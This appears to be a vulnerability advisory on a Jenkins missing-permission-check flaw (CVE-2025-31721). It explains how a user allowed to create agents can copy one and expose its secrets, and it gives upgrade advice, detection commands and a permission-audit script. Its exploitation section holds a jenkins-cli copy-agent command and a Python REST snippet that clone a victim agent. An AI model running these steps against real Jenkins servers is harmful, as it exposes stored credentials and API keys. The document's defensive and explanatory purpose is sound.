How CVE-2025-31721 Works
CVE-2025-31721 is a critical vulnerability in Jenkins (versions 2.503 and earlier, LTS 2.492.2 and earlier) that stems from a missing permission check. Attackers with Computer/Create permission but lacking Computer/Configure permission can exploit this flaw by copying an agent. This action allows unauthorized access to encrypted secrets stored in the agent’s configuration. The vulnerability bypasses intended security controls, exposing sensitive data such as credentials, API keys, and other secrets. The CVSS 4.0 score reflects its high severity due to the potential for privilege escalation and data compromise.
DailyCVE Form
Platform: Jenkins
Version: <= 2.503 / <= 2.492.2 (LTS)
Vulnerability: Missing permission check
Severity: Critical
Date: 04/29/2025
What Undercode Say:
Exploitation:
1. Prerequisite: Attacker must have `Computer/Create` permission.
2. Attack Flow:
- Use Jenkins API or UI to clone an existing agent.
- Retrieve secrets from the copied agent’s configuration.
3. Proof of Concept (PoC):
```bash
# Exploit via Jenkins CLI (requires initial access)
java -jar jenkins-cli.jar -s http://target:8080/ copy-agent "victim-agent" "malicious-agent"
```

```python
# Python script to exploit via REST API
import requests

session = requests.Session()
session.auth = ('attacker-user', 'password')
response = session.post(
    'http://target:8080/computer/doCreateItem',
    data={'name': 'malicious-agent', 'mode': 'copy', 'from': 'victim-agent'},
)
```
Mitigation:
1. Immediate Actions:
- Upgrade to Jenkins 2.504+ or LTS 2.492.3+.
- Revoke `Computer/Create` permissions for untrusted users.
2. Workarounds:
- Use Script Security Plugin to restrict agent-related scripts.
- Audit agent configurations for exposed secrets.
3. Detection:
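```bash
# Check the Jenkins version (Jenkins reports it in the X-Jenkins response header;
# /api/json has no .jenkins.version field)
curl -sI http://target:8080/login | grep -i '^X-Jenkins:'

# Log analysis for agent copy events
grep "doCreateItem" /var/log/jenkins/jenkins.log
```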
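An added audit sketch, not code from the original post or the Jenkins project, covering two of the checks above: whether a version string falls in the affected ranges, and which principals hold `Computer/Create` without `Computer/Configure`. It assumes the Matrix Authorization Strategy plugin's `<permission>` entries in `config.xml` (with or without the `USER:`/`GROUP:` prefix); other authorization strategies are not covered, and the sample config is constructed.

```python
import re
import xml.etree.ElementTree as ET

CREATE = "hudson.model.Computer.Create"
CONFIGURE = "hudson.model.Computer.Configure"
ADMIN = "hudson.model.Hudson.Administer"  # administrators can already configure agents

# Constructed sample of a matrix-auth section from $JENKINS_HOME/config.xml
SAMPLE = """<hudson><authorizationStrategy>
  <permission>USER:hudson.model.Hudson.Administer:admin</permission>
  <permission>USER:hudson.model.Computer.Create:admin</permission>
  <permission>GROUP:hudson.model.Computer.Create:contractors</permission>
  <permission>hudson.model.Computer.Create:build-bot</permission>
  <permission>hudson.model.Computer.Configure:build-bot</permission>
  <permission>USER:hudson.model.Computer.Create:intern</permission>
</authorizationStrategy></hudson>"""


def is_affected(version):
    """True if the version is in the ranges listed as vulnerable on this page."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version))
    if len(parts) >= 3:               # LTS line, e.g. 2.492.2
        return parts <= (2, 492, 2)
    return parts <= (2, 503)          # weekly line, e.g. 2.503


def risky_principals(config_xml):
    """Principals granted Computer/Create but neither Configure nor Administer."""
    grants = {}
    for node in ET.fromstring(config_xml).iter("permission"):
        fields = (node.text or "").strip().split(":")
        if fields[0] in ("USER", "GROUP"):   # newer files prefix the sid type
            fields = fields[1:]
        if len(fields) < 2:
            continue                          # not a "permission:sid" entry
        perm, sid = fields[0], ":".join(fields[1:])
        grants.setdefault(sid, set()).add(perm)
    return sorted(sid for sid, perms in grants.items()
                  if CREATE in perms and not perms & {CONFIGURE, ADMIN})


if __name__ == "__main__":
    for v in ("2.503", "2.504", "2.492.2", "2.492.3"):
        print(v, "affected" if is_affected(v) else "fixed")
    print("review:", risky_principals(SAMPLE))
```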
Additional Analytics:
- CVSS 4.0 Vector: `CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N`
- Impact: Confidentiality (High), Integrity (High).
- Patch Link: Jenkins Security Advisory.
Sources:
Reported By: nvd.nist.gov